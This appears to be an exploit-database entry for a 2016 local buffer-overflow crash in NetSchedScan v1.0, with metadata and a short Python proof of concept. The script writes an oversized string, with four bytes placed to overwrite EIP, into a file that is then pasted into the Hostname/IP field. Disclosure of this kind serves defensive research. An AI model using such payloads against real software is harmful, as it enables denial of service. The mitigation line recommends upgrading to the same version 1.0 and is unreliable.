header-logo
Suggest Exploit
vendor:
NetSchedScan
by:
Abraham Espinosa
N/A
CVSS
N/A
Denial of Service (DoS) Local
N/A
CWE
Product Name: NetSchedScan
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 8.1 x64
2016

NetSchedScan v1.0 scan Hostname/IP Field Buffer Overflow Crash PoC

NetSchedScan v1.0 is vulnerable to a buffer overflow crash when a crafted input is sent to the Hostname/IP field. This can be exploited by an attacker to cause a denial of service condition.

Mitigation:

Upgrade to the latest version of NetSchedScan v1.0
Source

Exploit-DB raw data:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title     : NetSchedScan v1.0 scan Hostname/IP Field Buffer Overflow Crash PoC
# Discovery by      : Abraham Espinosa
# Email        	    : hechoenmexicomx@hotmail.com
# Discovery Date    : 14/01/2016
# Vendor Homepage   : http://www.foundstone.com
# Software Link     : http://www.mcafee.com/us/downloads/free-tools/netschedscan.aspx#
# Tested Version    : 1.0
# Vulnerability Type    : Denial of Service (DoS) Local
# Tested on OS      : Windows 8.1 x64 es
# Steps to Produce the Crash: 
# 1.- Run python code : python NetSchedScan.py
# 2.- Open NetSchedScan.txt and copy content to clipboard
# 3.- Open NetSchedScan.exe
# 4.- Clic button Ok
# 5.- Paste Clipboard Scan > Hostname/IP
# 6.- Clic on add button (->)
# 7.- Clic button Aceptar
# 8.- Crashed
 
buffer = "\x41" * 388
eip = "\x43" * 4
 
f = open ("NetSchedScan.txt", "w")
f.write(buffer + eip)
f.close()